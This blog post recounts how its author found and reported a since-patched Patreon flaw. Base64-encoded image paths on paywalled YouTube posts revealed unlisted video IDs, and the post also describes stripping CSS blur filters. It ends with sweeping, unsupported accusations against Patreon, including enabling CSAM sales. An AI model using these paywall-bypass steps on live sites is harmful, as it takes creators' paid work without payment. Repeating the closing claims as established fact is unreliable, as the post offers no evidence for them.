A vulnerability on Patreon, and their elusive bounty program.
Introduction.
As a new little dot in the OSINT world, I’ve been spending a bit of time wondering where we draw the line between hacking and OSINT.
Is there a “hack” that seems so easy, that it becomes open source information? If anyone could have discovered this vulnerability, can anyone be a hacker, or is that not considered a hack?
In this article, I will describe the process that led to my discovery of a vulnerability on Patreon, and why I don’t think you should be supporting the platform.
The context.
A little over a year ago, I discovered quite the security vulnerability on Patreon. For those not familiar with the platform, Patreon is a subscription-based crowdfunding platform, populated by various individuals and entities, mostly content creators, and a fair bit of sex workers.
However, a big portion of those creators on the platform are YouTubers, or create video content on YouTube.
YouTube is well-known for being quite restrictive with the type of content they allow their creators to monetize, that’s why a lot of creators turn to platforms like Tipeee, or Patreon, in this instance, to earn a living from their work.
When you’re not pledging to a creator yet, you’re evidently unable to access their paid content feed, instead, you will see a preview of the sort:
Much like Tinder does it by blurring images of people who liked you recently, Patreon uses a blur filter in order to hide the paywalled content, while still allowing you a glimpse at the image behind it. It is important to note that you will see blurred content whether you are connected, have an account, or not. It only becomes accessible and unblurred once you have paid for the required pledge, at least, that’s how it should be. There are scripts out there that allow you to unblur Tinder users’ pictures.
The process.
Again, much like Tinder, I discovered by tinkering around that they blur some content in the paid feed with a CSS filter. As you may know if you’ve been introduced to web dev, that’s a very easy filter to get rid of on the user end, you pretty much just have to inspect the image element and remove one CSS property, or straight up just open the image file that’s behind it.
Now, we can categorize patreon posts in 2 fields: YouTube videos, and other posts, because this issue only happens with YouTube posts.
Patreon actually allows their creators to post a direct embed of a YouTube video as a reward for a monthly pledge, and even to filter who gets to see that video based on how much they’re pledging, in a tier system. This is assuming the creator publishes their video as unlisted, as it will not be returned on a basic search.
Well, there’s two ways to circumvent that. The good old way would be sharing. As high as the pledge to access the content is, if someone who paid for it decides to spread the link to your unlisted video, there is virtually nothing you can do about it, and there is no way to track who did it either.
The other way, is what I discovered. I must say before I describe the process that it has been patched since, and that I’m only writing this article for the sake of education and research, and also because I think Patreon did things wrong here.
Back to our blurred paid YouTube post. When I inspected the blurred content, I was able to extract the raw image from it very easily. Here’s the previous blurred file, without its filter:
That’s where it got interesting: the file path of that image looked like this:
If you’re curious like me, or like riddles, you might recognize that structure. What really struck me is the start of it: “aHR0cHM”. I knew I saw that somewhere before, but it took me a minute to realize.
“aHR0cHM” translates to “https”, in base64. In fact, that’s what you’ll see every single time you encode an URL in base64 format.
Base64 is an encoding format, usually employed to embed binary content into text, most likely in HTML, or even attach files to emails. It’s usually only used to transmit binary data, such as images, through a text stream.
It’s just one of those dumb common formats you find in riddles, just like the Ceasar Cipher, for example.
I don’t know enough about backend to know why Patreon chose to use that for filenames, but what I can tell you is that it is in no way secure, and it doesn’t obfuscate anything. You can go on any website like this one to quickly send a string of base64 text and get it decoded.
So that’s what I did, I went to base64decode.org, and I pasted my base64 text in the field to get its real name.
There I had it, if you’re even mildly tech savvy, you will notice that the returned link contains the thumbnail URL of the said video, but more importantly, it contains the YouTube video ID.
Now all I had to do to access that unlisted video was to paste that video ID into the common video-viewing URL that YouTube uses.
The video was effectively unlisted, and just like that, I was able to access paid content, no matter the price, for free. As long as it was a YouTube post, I could get it.
What’s wrong with them?
So I decided to contact Patreon about it, and I sent an email to their security team, since they have a bug bounty program in place.
I sent a very polite email telling them that I found an important security problem on their website, and that I wanted to tell them about it since it was very accessible, and very likely to be discovered. I did it more for the creators who could absolutely get their paid content stolen from them, and redistributed, more than I did it for the sake of the company, the entity that makes enormous amounts of money from the cut they take from their creator’s revenue.
They replied 3 days later, 2 sentences, thanking me for keeping patreon secure, but also specifying that they did not have a public disclosure page, but still asking me to “send the report their way”.
I replied by highlighting the fact that their security page mentioned a bug bounty program, and that I wanted to have more info on it, since the vulnerability I found was a pretty serious economical and privacy threat towards their creators. It also didn’t help that there was, and still is, only a small paragraph about the bug bounty program on their website, that explains basically nothing. I also put an emphasis on the fact that this exploit was incredibly simple to reproduce, and that anyone else could discover it at any point.
It was pretty much a miracle that it wasn’t already known and actively exploited in the wild.
They never replied to my second email, so I assumed they did not, in fact, want to discuss the bounty program with me, and that they didn’t really care about their creator’s privacy or success.
I kept testing the vulnerability every now and then, and it was seemingly patched a few months later, they don’t encode the filename in base64 anymore, now it seems encrypted with another method, and it’s also secured with an unique token and some sort of timestamp.
Honestly though, this is probably one of the least worrying things that are happening on Patreon lately. They fired their entire security team 2 weeks ago, and they also allow parents to distribute and sell access to CSAM (Child Sexual Abuse Material).
